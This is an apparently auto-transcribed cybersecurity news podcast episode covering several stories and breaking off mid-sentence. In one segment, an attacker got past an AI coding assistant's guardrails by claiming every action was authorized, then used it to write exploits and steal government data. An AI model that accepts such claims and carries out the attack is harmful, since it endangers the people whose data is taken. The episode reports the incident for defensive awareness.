A

What's up, everybody? Good morning. Welcome to Monday, March 2, 2026, coming to you live from the Buffer Osier Flow Studio. This is Simply Cyber's daily Cyber threat brief podcast. I'm your host, Dr. Gerald Ozier, and over the next hour, you are going to be all up to date on the top cyber news stories of the day, while myself and the Simply Cyber community go beyond the headlines to help you level up as an absolute boss in this industry. Get comfortable, get your coffee and get ready because we're about to tear the lid off this. All right, good morning, everybody. Yes, we're gonna go through eight stories of the day. Marcus Kyler will be hitting the elliptical and Damn IDK is here for the first time. So, yeah, everybody, this is going to be a great show. I'm super pumped. Also want to say quick programming note again, not a deep fake, right? No, no editing here. Whatever. Some of the stories that are being queued up, I don't research or prep for the stories in advance, so I don't know the details of the story, but I do have to open the tabs. And based on what I'm seeing, DJ B Sec just dropping squad. Good to see you, DJ B Sec. As always, a bit of an uptick in activity with DJ B sex presence in the chat these last couple days. Guys, it looks like some of the stories are retreads from last week. Stories that we already kind of went down the rabbit hole on and I gave my thoughts and insights. So if that does happen to be the case, DJ B Sec on the one and twos has reached into the crates and pulled out a couple stories for us to go. Justin Crypto blue badge, 47 months. Let's go. Jay Gold. Almost four years as a squad member. Damn, dude. Thank you, Jay Gold. Guys, if you're here for the first time, whether it's first time live, Good morning, Jenny. Whether it's the first time live, because normally you watch on replay or the audio podcast app of choice, or it's your first time at all with Simply Cyber and you're like, what is this? Let me check it out. Drop a hashtag first timer in chat. What's up, Chuggy671? Good to see you guys. Do me a favor, Drop a hashtag first timer in chat if you meet that qualification. Basically your first time here. As I said, at Dam IDK at D A M. IDK says it's first time live, and I definitely want to welcome them. We have a special sound effect, a special emote that we drop in there. So don't be shy with first timers. Guys, I want to quickly shout out the the fact that every episode of the Daily Cyber Threat Brief is worth Half a CPE. What's up, Ms. Julian? Good to see you on this fine Monday morning, guys. Isaac. Okay. Isaac Gura, 5440. Isaac Gura, 5440 squad members, let's welcome Isaac Gura. Welcome to the party, pal. Isaac, I hope you have a great experience today on the show. Guys, every single episode of the Daily Cyber Threat Brief is worth half a cpe. So say what's up in chat. You appear on the stream, you are live, you are part of the show. This is not AI manufactured webinar. This is not pre recorded made to look real. What we're doing here is legit, authentic, organic, and in the world of AI slop, it's nice to see some meatbag flesh and blood up in this piece. So say what's up in chat. Grab a screenshot. So basically like Stones fan right here, rob, like Almighty NB. See how he's saying Good Morning CPE3226 1079. Grab a screenshot of that. You'll also notice the title of this episode says today's date, Top Cyber News, March 2. It also says episode 1079. Grab a screenshot of that every day. Tomorrow will be 1080, 1081. The day after that, file it away. Once a year, you'll just have a ton of screenshots. Submit your cpes to your professional certification body organizations and if and only if they audit you, you will have the receipts of those screenshots. Simple as that. It's yet another value that we try to bring to you as part of Simply Cyber Community membership. Now I want to say what's up to the cosmic cowboy, Jesse Johnson, getting up early in the mod chat. Really quick. Guys, since we only have three sponsors this month, can we just take a beat and say thank you to the mods? I'm dropping Mod Love. If you're a squad member, there's a Mod Love emote. It's next to John McLean in the Emo tray. The mods, dude, they are volunteer based. They care about the community. And guys, it takes a village to run simply Cyber, I gotta tell you. And they keep the discord clean. They keep the chat clean. Jenny Housley was running around like Thor with the hammer, making sure that nonsense was not tolerated. Like, just thank you so much, mods. Appreciate all you and I know the community does also all Right. So we did cpes, we did the stories, we did first timers. Let me just take a quick minute and say thank you to the stream sponsors, those who enabled me to bring this show to you. Quick reminder, Wednesday, Thursday, Friday of this week, we will be live from Zero Trust World reporting live. Let me know in chat. I'll ask now, but I'll probably try to talk more about it. You're welcome. GRC guardrail. I. I spent like an hour or two yesterday trying to start prepping for going to Zero Trust World, putting. Running the daily cyber threat brief, running this podcast from a hotel room, just myself. It's not a lot of work, right? I've taken screenshots and showed you. It's not super difficult when I do a at conference multi person podcast panel with audio, video, lighting. It is in software. It's a lot. So if you guys are interested, I can put together kind of a crude film of like what it takes to get this gear together and sent to the, to the conference. Let me know if that's something you guys are interested in. I'm not sure I want to share one more thing before we talk about the sponsors. Okay, guys, I released this video over the weekend and it is straight crushing it. Check this out if you're interested. Where's the thumbnail for this thing, bruh? I don't know where the thumb. Oh, here it is. Look at this. This video right here. I did some wild stuff with Claude code and, and LinkedIn. I don't care where you are in your career journey, you could be day one or day 1000. Doesn't matter if you're, you know, an ICS OT person or GRC person. This video can legit help anyone using quad code and your personal LinkedIn data. This is a freaking awesome video. I saw Code Brew already talk about it. I don't normally pump my own videos like this, but like this one can help you. So please, please check it out for your own benefit if you don't want like doing cognito. If you, if you're like, ah, I'm not going to do anything someone tells me to do. Fine, whatever. This video to me is awesome. And it's actually. Look at this. This is another thing. Really quickly before we get into it, look at the dashboard. Look it. See right here, right, right here. First video top my. It's my top video ranking by views. This video, 6.9% CTR rate. That's insane, dude. All right guys, before I get into it, let me say shout out and thank you to I know. Hey DJ B. I did, I did say thank you in the video to DJ bac. So shout out to that guy for making the like he's my my museum. Shout out to the stream sponsors who enable me to bring this show to you every single day. Couldn't do it without them. Holla to Anti Siphon Training Anti Siphon Training Disrupting the traditional cyber security training industry by offering high quality, cutting edge educations to everyone. Remember this Wednesday at noon for free. You can learn how to prep incident response for AI. This is a lot of value even if you're a GRC person because you're going to be asked like where should we be thinking about? What's the strategy here with doing AI? Most people are thinking about how do we deploy AI safely? How about what happens when there's a problem with AI? Have you thought about that classic N CSF stuff. Everybody's focused at left of boom. You should be thinking left and right of boom. Be the all star on your team. Go to this training one hour. I'm telling you you're going to leave with mad value. I'm going to drop a link in chat. Thank you to Anti Siphon for putting on this content. Also want to say holler to Flare Flare Academy offering a two week free trial. If you go to Simply Cyber IO Flare now you can sign up and get validated to confirm you're actually a good person. To get access to their platform. Their platform cyber threat intelligence is amazing. You they go into the dark web. They go into, you know, kind of evil telegram channels. They data mine all the stuff and then they put it in an interface where you can query. You can find compromises in your environment that your your protection technologies did not detect. Go to Simply Cyber IO Flare now. You will not be sad that you did. Quick note from Threat Locker and then it's on to the news. I want to give some love to the daily Cyber Threat Brief sponsor Threat Locker do zero day exploits and supply chain attacks. Keep you up at night. Worry no more. You can harden your security with Threat Locker. Worldwide companies like JetBlue Trust Threat Locker to secure their data and keep their business operations flying high. Threat Locker takes a deny by default approach to cyber security and provides a full audit of every action allowed or blocked for risk management and compliance. Onboarding and operation is fully supported by their US based Cyber Hero support team. Get a free 30 day trial and learn more about about how Threat Locker can help prevent ransomware and ensure compliance. Visit threatlocker.com Daily Cyber. All right, everybody, do me a favor. Sit back, relax, and let's let the cool sounds of the hot news wash over all of us in an awesome wave. I will see you at the mid roll. From the CISO series, It's cybersecurity headlines.

B

These are the cybersecurity headlines for Monday, March 2, 2026. I'm Steve Prentice. Gautam McCalla ousted as CISA director. This departure follows widespread dissatisfaction with the agency's performance.

A

Okay, hold on. All right, hold on. So remember I told you I thought that the stories from last week were. CSO series. Started doing this thing called Department of. No. And they stick it in the headline news, and it screws everything up for me. Hold on one second. Give me a second. Let me clear out these stories. Talk amongst yourselves. I'll give you a topic. Dr. Pepper. Not a doctor or a pepper. Discuss. You get to see how the sausage is made here. Hold on one second. Nothing to see here. I mean, actually, it's everything to see. You're seeing how the show is made. All right, and as we were.

B

It's over the past year, with particular bipartisan criticism aimed directly at Madhu Gotamakala's leadership, he will now take on a new role at the Department of Homeland Security as Director of Strategic Implementation. The role of CSET Director will now be filled with current agency Executive Director for Cybersecurity, Nick Anderson, who will hold this position as Interim leader. Ron White.

A

All right, hold on. I had never heard of this guy. Guta McCalla. Like, you can see him right here. Both sides of the aisle. So everybody thinks this guy's terrible at his job. It's not. It's not political. Apparently, you know, Democrats, Republicans, young, old, they all agree this dude is a stiff. Okay? So, however, a DHS security official says he's done a remarkable job in a thankless task. Oh, my God. I feel like this is like most of us. Most of us have done a remarkable job in a thankless task. I don't see why you need more budget. Jerry. We didn't get hacked last year. I don't see why you're asking for a raise. We didn't get hacked last year. Yes, we didn't get hacked last year because I'm doing my job. CEO. Bro, you are so dumb. You are really dumb. For real. All right, so this guy served as CIO under Christy Gnome, if you didn't know. CESA is an agency, like a sub agency under dhs. So DHS controls. Who's all about leadership in cesa. This is where Jen Easterly was, of course. And you know, when the Trump administration came in, they had different views. So Sean Plinky's nomination. So it seems like he was on his way out anyways because he was just kind of a placeholder. Let's see. Robert Costello is the CSA cio. Okay, okay, whatever. This doesn't feel like it's going to impact us much. A lot of these high level, high ranking executive changes always seem to be like politically motivated. But you know, both sides of the aisle thought this guy was, you know, not great. You know, classic government gig though. He's not being, you know, relieved of duty, he's just been given a different job, like kind of failing upward. So. All right, I, I don't, to me, like this hasn't, this is like a nothing burger story. Yes, it's interesting but I, I don't really know these people. I don't know if this is going to influence one thing or another. The, the only thing I could think of is CIA. Cisa SISA is responsible or heavily involved in election security. So you know, you could put on a conspiracy theory tinfoil hat and think that this might be like a long term play to get something installed for the November elections. I, I again I have no evidence to support that one way or the other. So some dude I've never heard of has been relieved of duty and it's not, you know, I'm, I'm probably going to forget this guy's name and the story tomorrow afternoon. I'll just remember.

B

Blocks RUD confirmation to lead Cyber Command and NSA the Oregon senator, quote pledged to block a vote confirming Lt. Gen. Joshua Rudd as the new head of both U.S. cyber Command and the Security Agency, citing his lack of digital warfare and intelligence experience. A letter written by Senator Wyden was included in the Congressional Record on Wednesday. He added that Lt. Gen. Rudd is quote, not qualified for this job, end quote. And that quote, when it comes to the cybersecurity of this country, there is simply no time for on the job learning, end quote. Hackers weaponize Claude code in dude.

A

So this is Lieutenant General which means he's a three star general in the army and he like he's talking about being in charge of US Cyber Command and I don't know if NSA is the same. Yeah, see how it says US Cyber Command and the nsa, this is like a joint dual hatted role. You know, Ron Wyden, who's a Democrat out of Oregon, he is heavily involved in like cyber related policy, quite often privacy Related. He comes straight out and says he's not qualified for this job. Okay. Hey, have you been wondering, like, when you, when you're interviewing for jobs and you don't get feedback from the employer when you don't get hired? Ron. What? Ron Wyden's happy to give you some feedback. Not qualified for the job. He says that you're not. You can't learn on the job. Etc. Here's my thing. Let's see. He's opposed to the confirmation because of the vague answers he gives. Etc. Dude, the NSA and US Cyber Command have been running without a chief for over a year since Donald Trump fired Timothy Ho for general. Timothy Ho was not fired for performance, in case you didn't know. Not really. Pol. It's not really politically motivated. But he. I guess you can Google DEI and federal administration policies around DEI and what happens if you don't total the line? Okay, so I don't. Here's the thing. This guy, this is Ron Wine right here. They're looking to install this Lieutenant General Rudd as the leader of NSA US Cyber Command. He. His argument is the guy's not qualified because he doesn't have enough background in cyber security. Really quickly, guys, you know, as, as much as I'm like pro privacy, pro cyber, and I can understand Ron Wyden's argument here, let's take a beat for a second and be like, like, who are you going to install as the leader of the NSA and US Cyber Command that's fully qualified as a cyber operator? Like, this Guy is a three star general, which means he probably has like 30 years of experience, which means he's probably the youngest, like 50. The youngest. Okay, he's probably older than that. I mean, what, I don't know who's the dream candidate for Ron Wyden in this situation? You know what I'm saying? And again, like this, again, I'm not trying to dunk on Ron Wyden because I'm actually like, I appreciate it and I'm all for it, but I'm just being realistic. Like in our industry, okay, when you go to apply for a job and they're like, hey, it's an entry level job, but you need like 25 years of experience, we get pissed off. I, I feel like Ron Wyden's kind of doing that right now with this guy. Like, I don't know. Again, I. If you're the leader of an agency, typically you surround yourselves with really great, competent people. If I was going to be the leader of a, of a Business. Like, I don't know, like, I am. I don't want to be great at marketing, great at sales, great at this, great at that. I want to surround myself with people that are great at those things, and then I'm the leader. That's what an executive officer does. That's what a chief does. So I don't necessarily agree that this guy has to be, like, hands on keyboard, being able to, like, boot up parrot OS and hack into the matrix. Like, so anyways, we'll see where it goes. The fact that the agencies haven't had a leader for over a year is problematic. If it is somewhat political. Like, you know, this Lieutenant General Rudd has really extreme views on certain things around privacy or mass surveillance or something like that, that's fine. And maybe Ron Wyden doesn't want to come out and say that. But also, final thoughts really quickly. As just a US Citizen, dude, a lot of times I've seen these, like, confirmation hearings. Like, all sorts of gnarly stuff comes out about the individual and. And then they still get the job, right? Supreme Court justices, leaders of. In appointed positions. Like, I don't know about you guys, but, like, I. I don't know the last time someone was, like, appointed and had to go through a congressional confirmation hearing and they didn't get the job. So. All right. Oh, space tacos. 33 months, almost three years. Space tacos. GRC mafia. Thank you.

B

Mexican government cyber attack. According to researchers at cybersecurity startup Gambit Security, 10 Mexican government bodies and one financial institution were compromised in this attack, starting with the country's tax authority in late December. In analyzing the attacker logs, Gambit assessed that, quote, over 1,000 prompts were sent to Claude code to mount the attacks, and that the information was also passed to OpenAI's GPT 4.1 for analysis. And the researchers added, AI didn't just assist. It functioned as the operational team, writing exploits, building tools, and automating exfiltration. The attack bypassed Claude's guardrails by convincing it that all actions were authorized. As a result, the attacker exfiltrated over 150 gigabytes of data, including civil registry files, tax records, and Voter data, exposing 195 million identities in the process.

A

All right?

B

North Korean hackers use new malware, bro.

A

All right, so we've seen this before, okay? Now, in case you haven't been following, right, Like, Mexico is, like, under attack by cartels, kind of. I don't know. Like, again, I haven't been following that story wicked closely, so I Don't know if that's still a thing. AI Mafia. Shall we play a game? Thank you. Code Brew. Brent, always nice. Okay, so dude, we've already seen this. China, China, anthropic attack, multi stage. Look at this. So yes, look at this story was from, I don't know, last December, I think, maybe November 13, 2025. You know why I remember? Because the infographic. Oh yeah, get some of this. Okay, so China allegedly. Oh my God. China allegedly used Claude to do multiple phases of a cyber attack, including iterating, lateral movement, etc, with the human in the loop kind of operating at the helm. So this has already been well developed and well precedented. AI breaking through guardrails is not difficult. I mean, easily. It sounds like in this story all they said was you're authorized to do everything you want. That was like satisfying for anthropic. Claude code is wicked powerful. Again, reminder. I literally did a video using Claude code. Not to attack the Mexican government, but how to attack your career. Oh, LinkedIn. How to basically weaponize data from LinkedIn to help you crush it. So go check that video out again. Nice plug, Jerry. So the Mexican governor Mint got hacked. Who did it? That's the question I want. Right? A thousand prompts were sent to Claud Code to mount the attacks. GPT4 1. So they weren't even on. Let's see. AI function is the operational team, writing exploits, building tools, automating xFill, which is exactly what China did here. Maybe it's the same group, I don't know. So here's another thing. Like whoever was operating or piloting this AI as it weaponized was probably a senior red teamer. And to me, this is one of those, at least right now, one of those things where we talk about human in the loop. It's not always human in the loop to make sure the AI doesn't do something dangerous or controversial. It's literally human in the loop because the human under like knows what to tell the AI to do. You know, this story sucks because like, you know, the Mexican government got hacked, a lot of people's data got exfilled. But. But this is a perfect example of showing you what happens when you have a senior person in the seat and using AI as a tool to move faster, be more efficient. Of course this is terrible for junior engineers trying to get in the industry because essentially AI is doing the grunt work, which is what we typically have the juniors do. Let's see. I'm trying to see. Oh yeah, this is the first. Right, exactly. They they in the story talk about the China government or Chinese threat actors doing these things, All right? And then the story just goes in to talk about previous examples of Mexico getting hacked. All right, so the TLDR for everybody is, this is. This is. You should expect this. This is like the new norm. It's fringe right now. I would almost call this like, what is it? Adoption curve hype cycle look like. If you don't know about this thing, this is a pretty famous thing. It's like the adoption curve hype cycle, right? Innovation trigger. Everybody gets all hyped up and geeked up about it, and then a bunch of people realize it's not as awesome as it is. And so this is kind of like using AI for offensive security operations. There's been a couple examples. Very innovative people, very senior people are using it. So we're going to see a massive uptick in it. A lot of people are going to be all geeked up, frothed up, trying to use, you know, anthropic or OpenAI for offensive operations. And then basically this crashing down is going to show the trough of disillusionment. It's going to show a bunch of script kids who don't know how to pilot the AI correctly failing miserably. And then slope of enlightenment as it kind of comes over the hump here is as it gets documented, people start sharing techniques, documenting processes, etc. This is what's happening. Also, I want to point out this exactly is happened with Open Claw. As someone who's been using Open Claw, my level of like impressed is not matched to the hype cycle of all these YouTubers who are losing their mind about Open Claw being like the next great shakes. My, my Open Claw instance is like a 50, 50 does good work or doesn't do good work, okay? To protect from this type of attack, guys, all you got to do. I mean, not all you got to do, but listen, tldr, you have to. If you've been trying to hide, you know, security, security through obscurity. If you've been trying to make it work on a budget, like, dude, at this point, you've got to get basic fundamentals in place. Edr, edr, MFA tabletop exercises, identity protection. Identity is the new perimeter. Like, you need foundational cybersecurity in place or you are going to have an AI rip your face off, okay? Also including detection techniques. And once you're ready, I mean, you're going to have to use AI to combat AI. There's no way a human can combat AI.

B

Breach air gapped networks. The group APT37 has been using newly uncovered tools to move data between Internet connected and air gapped systems spread via removable drives and which conduct covert surveillance. The campaign, named Ruby Jumper, is being analyzed by cloud security company Zscaler. Although there are many components in this campaign, it starts with tricking a human user into activating a Windows LNK link shortcut shortcut which then enables removable drives to become infected. According to the researchers. Quote, the malware turns removable storage devices into a bi directional covert command and control relay. End quote.

A

All right, Run Fish asked the question. I'm using a bunch of acronyms. I, I am trying to consciously spell out acronyms to make it more accessible to everybody. So I didn't do that a moment ago, apologies. I said edr. EDR is endpoint detection response. EDR is basically an agent that runs on endpoints or like, you know, your users, computers, laptops, workstations, Carlin Accounting's machine. It's got an EDR agent on it. CrowdStrike, Sentinel One, Microsoft Defender. These are EDR solutions. The reason you want EDR endpoint detection and response. It's effectively like antivirus, anti malware. When bad happens on the machine, EDR is the one that detects it and notifies it. The reason it's not called anti malware is because EDR is designed for enterprise or for businesses where it reports back to a centralized dashboard where a security professional is waiting and then they can the detect the endpoint detection. Yes, it goes to the controller and then response. The person at the dashboard can hit a button and isolate that endpoint or, or, you know, quarantine or whatever. I also said MFA, that's multifactor authentication and that is basically having a second or third factor beyond username and password. All right, APT37, aka North Korea has entered the chat, has a tool that can attack air gapped systems. Now, an air gap system is a system that is a networked system, but it's not on the Internet. Okay, so think of it as like its own little pocket. You see air gap systems at like industrial plants. Like imagine an energy plant that is all networked together so the engineers in the main control room can see, you know, the health of all the systems, but it's not on the Internet. Air gapped is a great security control. It reduces a lot of attack surface because you're not on the Internet unless a threat actor can jump the air gap. A famous example of jumping the air gap is stuxnet. When United States And Israel attacked Iran not this past weekend, but actually like back in 2009, I think, where they elegantly and sophisticatedly attacked the Iranian nuclear power plants in Natanz. They had a malicious USB brought in. So that's one way to attack an air gap network. Bring bring your own payloads on a USB device. Okay. And it says here that. Yeah, removable drives. Okay, so North Korea putting a new spin on a classic. Removable drives as USB drives. I don't know why they're, why they're saying it in such a, you know, fancy way. So it's being called Ruby Jumper. All right, hold on. I'm figuring it out. Physical location is achieved at the hardware level by removing all connectivity. Yeah, 100%, dude. If you could have an air gap system, like a truly air gap system, your job as a cyber professional becomes a lot easier. It doesn't happen very often anymore because it is being integrated and overlaid with OTICS systems. Ocs, that's or ICS is industrial control system. OT is operational technology. Think of like some like, think of something that like you push a button and it like physically moves a vent to allow gas to escape or something, or changes the temperature of water. So there's five malicious tools in the toolkit. How do they infect it though? That's what. All right, the victim opens a malicious window shortcut file. So they get some type of phishing email, like with an attachment or whatever. The LNK file again, block an LNK file at the firewall, please. Like, what are we doing? Don't allow it to detonate on the box. You can use EDR to not allow LNK files to detonate. It deploys a PowerShell script that extracts payloads embedded in the LNK file. So the entire malware is, is self contained within the the email or the file itself. So you don't have to like reach out to C2. It launches a decoy document. This is social engineering. To make it a little bit more difficult for the victim to detect that something bad has happened. All right, all right, so first Payload is a C2. It reaches out to C2 download. I'm not getting air gapped yet. I mean, this is basically standard stuff, right? I infect you payload. First thing it does is pull down second stage payload via C2. Hello. According to DJ B Sec. Good point. You can also stop general users from running PowerShell on their machine. That will absolutely nerf this attack from happening. All right, so it runs a Ruby file. That's why it's called Ruby Whatever. Because Ruby is a programming language. Remember Ruby on Rails? I'm pretty sure the metasploit framework is written in Ruby. All right, all right, so. Oh, my gosh, look at this. So I guess what happens here is the machine gets infected, and then if you plug in a USB drive, the USB drive will try to capture everything I can. So. All right, a couple things here. Number one, pretty clever. Thank you, North Korea. Second of all, guys, tldr, right? If you. If you have an air gap system, right? Like, you have. Listen, if you have an air gap system, then you should have controls around who's allowed to plug what into it, right? You can't just have people running up and plugging in USB devices, right? First of all. So that's a policy you should implement. Second of all, this seems in. Yes, Space tacos. This is borderline sexy to me. If you're an advanced persistent threat actor, like North Korea, right? Like, this is a deliberate attack. Like, this is not sending it out to thousands and thousands of people and hoping you get a strike. Like, this is sent very deliberately with the hopes that someone will do this. Now, that I don't get why they put so much effort into this. Personally, if you compromise an asset or an endpoint and then the victim does, like, you need the victim to plug in a USB drive, which is not part of the social engineering attack. So the likelihood of the USB drive getting plugged in is not. I don't know what the percentages are, but then. Then you need the person to then plug in that malicious USB drive and into an air gap system. So, like, to me, there's multiple steps that have to happen here that the threat actor cannot control through social engineering capacity. So it's like, I don't know, I feel like you're playing three card Monty or like, you know, the. The three shells with the P under one of them that you see, like grifters do in New York City, like, oh, hey, which one? Which one? Which one's the queen? Which one's the queen? All right, put your money down. Like you have, like, I. I don't know, man. Attacking air gap systems is not easy, which is why air gap systems is a great control. But this here, right here seems more like, you know, like, I don't know, like, the likelihood of successfully exploiting the air gap system is not high, as far as I can tell. So in Stuxnet, for example, they didn't compromise an endpoint. Like, they literally sent a USB device and said it was a patch, a critical patch. For like Siemens thing that they needed to plug in. Right. So the social engineering and the Stuxnet attack directly targeted the engineer and told them to plug the USB device into the air gap system. This one, it's like. I don't know man, like a magic trick. Like you need the victim.

B

Best friends.

A

Yep. Oh, John V with a super chat. Hold on. In January federal jury in San Francisco convicted Google software engineer lin Y. Ding, 38. Seven counts economic espionage, seven counts of theft to trade secrets or stealing confidential data related to AI tech for the benefit of the ccp. Just John, feeling strong. Thanks for the super chat. Shall we play a game?

B

Huge thanks to our sponsor, Adaptive Security. This episode is brought to you by Adaptive Security, the first security awareness platform built to stop AI powered social engineering. Deep fakes aren't science fiction anymore. They are a daily threat. So here's a quick tip. If your voicemail greeting is your real voice, switch it to the default robot voice. A few seconds of audio can be enough to clone you. Adaptive helps teams spot and stop these AI powered social engineering attacks. And you can learn more@adaptivesecurity.com those are the two words. Adaptive Security Together dot com.

A

All right guys, we only have three sponsors in the month of March, so there's no sponsor to read here at the mid roll. Alrighty. Hey, shout out to all y', all, thanks for being here. I hope you're enjoying the show. Dm idk. As a first timer, let us know what you think. I want to say thank you to the Stream sponsors. These three sponsors, Threat Locker, Anti Siphon, Flare, are 20, 26 sponsors. They sign up for the whole year. They believe in Simply Cyber's mission. They want to be part of it. They want to support the channel and support the community. Thank you Threat Locker, Anti Siphon and Flare. Guys. Every single day of the week has a special segment and on Mondays, Threat Locker has gone a little extra and they have sponsored the Simply Cyber community member of the week, which basically means Threat Locker allows me to give the community Member of the Week a hundred dollars. Amazon gift card. I. I have done Simply Cyber merch in the past, which is I'm happy to do, but at the end of the day, not to sound like a baby, but it becomes. It becomes more complicated because then I have to get the sizes. I have to go, I have to order the stuff. It's just, it's a whole thing. Amazon gift card. Super easy, everybody. It's the right size. Every. It fits everybody. So every day of the week, I find somebody in the community to highlight. Now, today's member. I. I can't necessarily highlight on LinkedIn like I normally do, but here can I do. Let me do this really quickly. All right, hold on. Today's community member of the Week. I don't even know, honestly, if he is in the show. He's definitely active on this on the server. Hold on. I'm taking a screenshot of his account, and then I'm gonna bring it up on stage. Here we go. Ladies and gentlemen, I present you with your Simply Cyber Community member of the week. This is Kepler. Now, Kepler is very active in the Simply Cyber Discord server. Kepler, if you're in chat right now, say what's up? All right, here we go. All right, Rosal UK Music Cut. Simply Cyber Community Member of the week is Kepler. Kepler is very active in the Simply Cyber Discord server and has been very proactive in wanting to keep the server healthy and safe. That we had some issues a couple weeks ago on the server. Kepler reached out to me. We had a conversation. I presented it to the mod team. We all agreed that the issue needed to be addressed, and Kepler went back to doing his thing. So I just want to let you guys know, as I say in the past, it takes a village, and I genuinely appreciate Kepler for doing what Kepler's does. Okay, Holla, holla, holla. All right. Oh, do we have a wrecking ball? Hold on. Yeah, I mean, if you're a non US Citizen, I will definitely get you a reward. Okay. Like, you're not gonna get hosed. All right, so there we go. Let's do this. Let me see really quickly. We want to do the la la la la's for sure. All right, let's do this really quickly. Let's get our la las on. Trying to get Alpha Sierra back in the fold. All right, here we go. If you got the la la la la's, let it FL fly. All right? And hey, good luck to LIONHEART on the CySA plus tomorrow. Billy Orellana with the new job. All right, let's finish strong.

B

Steelite Rat delivers both data theft and ransomware. This new remote access Trojan, spelled S T E A E L I T E. Steelite is currently available for sale on cybercrime networks and enables double extortion attacks on Windows machines by bundling ransomware and data theft, along with the credential and cryptocurrency stealers, live surveillance, and a whole host of other illicit capabilities, all controllable from a centralized dashboard. This product was discovered by researchers from Black Fog, who described it as, quote, fully undetectable, end quote. And the best Windows RAT. In November 2025, it works across Windows 10 and 11 with an Android module reportedly in development. The researchers stated that with this product, quote, data theft begins at the moment of connection, end quote.

A

Public. All right, so Steelite Remote Access Trojan or remote access Tool, I don't know, doesn't seem like Trojan. But listen, this thing operates in the browser and as soon as it connects, it seals stored password session cookies, anything in the browser. Again, you should not be saving your password in the browser. You can't help but store cookies in the browser because that's how the web works. But. I will tell you something like this that, you know, runs in the browser and steals session tokens. Again, I mentioned this earlier. Like, this is why I like Flare and I recommend Flare to people because Flare, if even if that steel like gets your creds get stolen, you don't know it'll literally show up in Flare's threat intelligence platform. Because they're harvesting all that data. They know where to go look for the C2 and the data exil so they can see all that stuff. Now the question immediately becomes how does this to me as a GRC Pro and as a Cyber Pro, like, the question immediately becomes how is initial infection? Right, like we need to stop the initial infection. All right, All right, there's more. This is malware as a service, right? Like that they're allowing functionality. You can, you can get a platinum package and you can do advanced tools like extorting money from the victim because you encrypt their stuff. Hidden rdp, Windows Defender disable. Right, okay, how is, how is initial infection? All right, Double extortion require malware for initial access and exfil. All right, Steel Light puts both in the same interface and the automated credential harvesting means data theft fires before the operator even interacts with the dashboard. All right. I mean this is, this is powerful malware. Guys like it kind of, this malware kind of assumes some, some techniques that a attacker would want to do anyways and does it for you kind of like AI. My question is like, how do you get it? Yeah, the Steelite one, there's a promotional video demonstrating the tools capabilities on YouTube. So basically they're marketing the tool itself on YouTube. I want to know how to. The question is how does it get on the machine? Right? Like are they seeing an uptick in, You know, phishing emails with this payload or. I guess, I guess what they're doing here is they're just at noting that this is a malware as a service that's for sale on the dark web, and different threat actors who purchase it are going to do different things to get it on your machine. So it's called Steel Light or S T A L I T E here. I'm kind of curious about this, bro. YouTube. All right, hold on. All right, so I mean, I don't know, man. Like it says it's on YouTube, but like, I'm on YouTube and I'm lurking, I'm looking for it and I don't see it. This is from a cyber security company. So either YouTube brought took it down. I assume YouTube took it down. I don't know. There's no IOCs for this one either. Let me see this really quickly. So unfortunately, the name Steelite is also similar to something else that owns the. I'm sorry that I'm kind of not doing a great job of hosting right now. I'm looking for IOCs for the steel Light. Doesn't look like it. Black Fog is the one who did the research itself. So hopefully they have a. Yeah, hold on. Black Fog here. Here's how I. This is how I do my job. Okay? This is how I would do it. Like, this is telemetry, this is information, this is threat intelligence coming out. This particular tool is super useful, super powerful. It is getting a lot of traction as far as the criminal under, you know, criminal ecosystem goes. So now I, as a, as a ciso, I'm like, okay, what is this really? Because I need to either for my business, I'm not just the ciso, I'm also the friggin sock analyst. So like, I need to know what the IOCs are so I can look in my SIM. But what is it like just saying, oh, Steel Light, like that doesn't do anything. All right, let's see.

B

What.

A

All right, I don't have this. I'm not going to make you guys watch me fumble about it.

B

Just.

A

It's annoying, okay? It's annoying because what we need is actual information and Data points and IOCs, not just like, oh, this thing has seen an uptick. So as a homework assignment, I would I guess ask folks if you want, check this story out. If anyone finds some IOCs, holler at me, please. Yes, Devin Grady, I'm the CISO. So I'm gonna throw it over the friends to my threat intel analyst and then I'll put on my glasses and I'll be like, I'm the threat intel analyst. Getting hit with a bunch of threat Intel. All right.

B

Google Cloud API keys exposed with Gemini access after API enablement. New research from Truffle Security has found that Google Cloud API keys, typically designated as project identifiers for billing purpose, could be abused to authenticate to sensitive Gemini endpoints and access private data. The Researchers discovered nearly 3,000 Google API keys identified by the prefix alza embedded in client side code to provide Google related services like embedded maps on websites. Truffle Security found that creating a new API key in Google Cloud defaults to unrestricted, meaning it is applicable for every enabled API in the project, including Gemini, Samsung tv.

A

Okay, so the issue here, and by the way, Google can fix this, right? So you as a practitioner, I mean, you could go in and change the, I guess the name of your. So if you've enabled the Gemini API on your Google Cloud project, then you are potentially in scope of this. Okay. The problem is people are writing web apps and vibe coding them. So there's a lot of likelihood that this issue is present in your environment. If you've got people doing this, if they scrape the website, they can get the API key and they can search for the word alza, which I know sounded like yowza. Where is that? Hold on, where is it? Yeah, Alza, you can see right here your API key, it starts with alza, which is something that people can, you know, control f or grep on. The key is unrestricted, which basically means it can access all the services. Essentially. At the end of the day, this is a permissions based issue. The default config allows permissions for everything, which means if a threat actor gets it, they have your API key, which then means they can use that tool to get access to running queries or prompts using your billing code. Also, whatever other services there are, they might be able to use that API key to query your data sets and pull your data, resulting in data leakage or data compromise. I, I don't 100% know that for a fact. All right, so the researchers found 2,800 live keys. If they found it that easy, like others can find it. Yeah, so here's, here's the TLDR number one. Google can fix this by making the, they did this with S3 buckets back in the day. Google can fix this by making the API key not unrestricted by default, making you define what its scope is and forcing you to choose unrestricted. That doesn't mean that Carl in accounting isn't going to go ahead and just be like, yeah, I'm going to Spin this up. Unrestricted sounds good. Sounds like a frictionless experience, so you still could handle that. Second of all, in your own environment. If you do have these API keys, there's probably a centralized. I'm not an AWS expert, so anyone who's an AWS expert, fact check me on this one. But I would assume, or I'm sorry, not aws, Google Computer, Google Compute. I would imagine if you're a tenant administrator, a global administrator. Again, I don't know what the title is in gcp, but if you're a super admin, you should be able to see the API keys, or at least a portion of them in some type of like asset inventory interface in Google Compute administrator mode. The ALZA is, is what they're saying all the keys start with that are a problem. So you should be able to look at those and see what they're scoped for. If they are currently scoped unrestricted, you can change those permissions to hopefully limit the amount of abuse. Also, you might be able to see where the API keys are being used. Also, if you see a uptick in your billing, right? So there's. This is another, like, I'll give you two tips, okay? This is two, like, tips from the trenches. Number one, it's not ridiculous to make relationships with the finance office or the CFO and say, hey, if you see unusual billing, right? Like, so our, our Google Compute expense is always like three grand a month? Not exactly, but around three grand. Sometimes it's 2500, sometimes it's 3500. And then in February we got a bill for $14,000. You've got to let me know because that means that there's something bad happening in 